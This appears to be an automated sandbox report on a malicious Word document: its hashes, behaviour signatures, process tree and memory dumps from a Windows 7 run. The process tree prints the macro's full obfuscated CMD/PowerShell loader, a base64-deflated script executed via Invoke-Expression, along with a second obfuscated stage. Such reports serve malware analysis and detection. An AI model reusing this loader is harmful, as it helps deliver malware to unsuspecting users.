Analysis

  • max time kernel
    118s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    12/09/2024, 18:04

General

  • Target

    dcc46ab577ad8150cbc5246f21984c55_JaffaCakes118.doc

  • Size

    66KB

  • MD5

    dcc46ab577ad8150cbc5246f21984c55

  • SHA1

    a6d708c6a8d015fe2435a0fd03fef758282c65b5

  • SHA256

    0c9fb2e39787d2f5e31a2120712989a174aa64426f037ce8b3157a00925d10f9

  • SHA512

    bb6a4af4c2c53786ed148d58ee244436f91515e908d0adb441539f61d789e9a774cc28eaaf1a243ddda269b3f49733f284e085cddd9510d9df4d3ce0acf6c4a1

  • SSDEEP

    768:UX3mVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9C8lzKQli9/4:Omocn1kp59gxBK85fBt+a9f2

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\dcc46ab577ad8150cbc5246f21984c55_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2652
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2668
      • C:\Windows\SysWOW64\CMD.exe
        CMD Cmd.exe /c"Set tDJr=. ( $ShELliD[1]+$sHElLid[13]+'X') ( NEW-oBJECt SYstEM.iO.compREssion.dEflatEStrEAM( [SySteM.Io.MeMorysTrEAm] [SysTem.COnvERT]::FRombaSE64StRiNG( 'TZBha8IwEIb/Sj8Uorgm0wluloJsQy1DGQxxg325Jlcb2yahJq1O/O9rZcLgvtzde8/dvX4q15HCJtDJHrn11mjpFpOXQqKyoZ++yYhk1popY7vKGW2wwh+BNVQ7OFCuS5Yv4snsT9I0DU2DhzHdG9Z0EXCtbEtizhQaxIGN7oeP7HO4fH+a34ZEXtNU5rqkiROycJmrKHAqBducVsuTxf/0dqNTUoDAIoVKXy9wMI5vGg4HKGGngJZHVnNYEPphCml7ZEb6of+cbb3II+PRhHTJKvJR1VOLpRmQbzLo+gNC8YgkTHWFwLOe/2U3nlRe50X/bKvT2W89o6+6Ud1Lc1ngVXPndcB+GKta5xjELfRaCZOWk4cXDpZn58vlFw==' ) ,[Io.CoMPreSsIOn.ComPReSSIONMODE]::DEcOMPress)^| FOrEACh { NEW-oBJECt iO.sTreaMREADer( $_, [tEXt.EncOding]::AsCIi ) }^|FoREach{ $_.ReaDToENd( ) } )&& POweRshELl ${v`R45} = [TYpe](\"{3}{0}{2}{1}\"-f'v','nMEnt','IRo','EN' ) ; ${exECuTIoncONTeXt}.\"InV`oKeCOMM`AnD\".( \"{2}{1}{0}\" -f'Pt','okESCrI','InV' ).Invoke( ( ( DIr ( 'vAri' +'Abl' + 'E:' + 'VR45' ) ).\"VA`Lue\"::( \"{5}{2}{4}{1}{3}{6}{0}\" -f 'le','TvAri','nvir','a','OnMEn','gEte','b' ).Invoke(( \"{1}{0}\"-f'JR','TD' ),( \"{0}{1}\"-f'PR','OCess' ) )) )"
        2⤵
        • Process spawned unexpected child process
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2824
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          POweRshELl ${v`R45} = [TYpe](\"{3}{0}{2}{1}\"-f'v','nMEnt','IRo','EN' ) ; ${exECuTIoncONTeXt}.\"InV`oKeCOMM`AnD\".( \"{2}{1}{0}\" -f'Pt','okESCrI','InV' ).Invoke( ( ( DIr ( 'vAri' +'Abl' + 'E:' + 'VR45' ) ).\"VA`Lue\"::( \"{5}{2}{4}{1}{3}{6}{0}\" -f 'le','TvAri','nvir','a','OnMEn','gEte','b' ).Invoke(( \"{1}{0}\"-f'JR','TD' ),( \"{0}{1}\"-f'PR','OCess' ) )) )
          3⤵
          • Blocklisted process makes network request
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2676

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      ee0de1c646fcd599e5a7e47ebb0ab058

      SHA1

      c6d1ec74914063c36b96e1db3cb0cdb7f52d4260

      SHA256

      4ae5fde109fe2fe1e3aa3ccb86408b44641562cf90dbb0267381d6d2f4541773

      SHA512

      32972bad34b937946dc6657d0d9ebf46d8ac99d1f0537d4c84f6117051a1a4a5329857d8a65cc8f505e98b7660f21bcd2c01f19039f63adbc2d77bde297f5d95

    • memory/2652-0-0x000000002F241000-0x000000002F242000-memory.dmp

      Filesize

      4KB

    • memory/2652-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2652-2-0x0000000070F9D000-0x0000000070FA8000-memory.dmp

      Filesize

      44KB

    • memory/2652-4-0x0000000000870000-0x0000000000970000-memory.dmp

      Filesize

      1024KB

    • memory/2652-5-0x0000000000870000-0x0000000000970000-memory.dmp

      Filesize

      1024KB

    • memory/2652-6-0x0000000000870000-0x0000000000970000-memory.dmp

      Filesize

      1024KB

    • memory/2652-14-0x0000000070F9D000-0x0000000070FA8000-memory.dmp

      Filesize

      44KB

    • memory/2652-15-0x0000000000870000-0x0000000000970000-memory.dmp

      Filesize

      1024KB

    • memory/2652-30-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2652-31-0x0000000070F9D000-0x0000000070FA8000-memory.dmp

      Filesize

      44KB